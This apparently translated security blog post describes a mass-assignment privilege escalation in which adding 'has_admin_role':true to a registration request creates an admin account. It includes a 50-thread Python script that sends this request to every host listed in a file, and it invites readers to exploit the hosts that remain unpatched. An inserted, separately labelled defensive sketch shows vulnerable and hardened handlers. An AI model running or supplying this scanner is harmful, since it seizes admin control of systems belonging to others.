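0x01 Preface
Yesterday I saw a vulnerability alert on FreeBuf. That evening cwkiller sent me the reproduction steps and asked me to write an article, and then I asked Broken to write a batch script so we could work through a round of reports. I got through two pages; submitting vulnerabilities is exhausting (actually, a lot of them were ignored on Butian). So I am publishing it so that everyone can have a go and pick up whatever is left.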
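Click Register, then capture the request.
Append the following to the request body: "has_admin_role":true
Check the response; 201 means it succeeded.
Log in with the account to verify.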
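The steps above work because the registration endpoint binds a client-supplied `has_admin_role` key onto the new account. The sketch below is an added example, not code from the original post or from the affected product: it contrasts that mass-assignment pattern with an allowlist-based handler. The function names, the field allowlist and the sample e-mail address are assumptions made for illustration.

```python
import json

# Keys a self-registration may set (the non-privileged keys of the request on this page).
SELF_SERVICE_FIELDS = {"username", "email", "realname", "password", "comment"}
PRIVILEGED_FIELDS = {"has_admin_role"}  # only an authenticated admin may set these

# Constructed sample: the registration body with the extra key appended.
SAMPLE = (b'{"username":"test1","email":"test1@example.invalid","realname":"test1",'
          b'"password":"Aa123456","comment":"test1","has_admin_role":true}')


def register_vulnerable(raw_body):
    """Mass assignment: every client-supplied key is copied onto the new user."""
    user = {"has_admin_role": False}
    user.update(json.loads(raw_body))
    return 201, user


def register_hardened(raw_body, caller_is_admin=False):
    """Allowlist binding: returns (status, user); user is None when rejected."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return 400, None
    if not isinstance(body, dict):
        return 400, None
    if set(body) - SELF_SERVICE_FIELDS - PRIVILEGED_FIELDS:
        return 400, None  # unknown keys are refused rather than silently bound
    if PRIVILEGED_FIELDS & set(body) and not caller_is_admin:
        return 403, None  # privilege flag present on an unprivileged request
    user = {k: body[k] for k in SELF_SERVICE_FIELDS if k in body}
    # Derive the flag server-side; accept it only as a real JSON true from an admin.
    user["has_admin_role"] = caller_is_admin and body.get("has_admin_role") is True
    return 201, user


if __name__ == "__main__":
    print(register_vulnerable(SAMPLE)[1]["has_admin_role"])
    print(register_hardened(SAMPLE))
```

A 403 from the hardened path is also a useful signal to log and alert on, since a normal registration form never sends that key.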
import requests
import json
import csv
from concurrent.futures import ThreadPoolExecutor


def exp(url):
    url = url + '/api/users'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Content-Type': 'application/json',
    }
    payload = {
        "username": "test1",
        "email": "[email protected]",
        "realname": "test1",
        "password": "Aa123456",
        "comment": "test1",
        "has_admin_role": True
    }
    payload = json.dumps(payload)
    try:
        requests.packages.urllib3.disable_warnings()
        r = requests.post(url, headers=headers, data=payload, timeout=2, verify=False)
        if r.status_code == 201:
            print(url)
    except Exception as e:
        pass


if __name__ == '__main__':
    data = open('ip.txt')
    reader = csv.reader(data)
    with ThreadPoolExecutor(50) as pool:
        for row in reader:
            if 'http' not in row[0]:
                url = 'http://' + row[0]
            else:
                url = row[0]
            pool.submit(exp, url)
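On success the URL is printed, and you can then log in directly with the username and password shown above.
For technical study and exchange only. Do not use this for illegal purposes; otherwise you bear the consequences yourself. If you liked this, give us a follow!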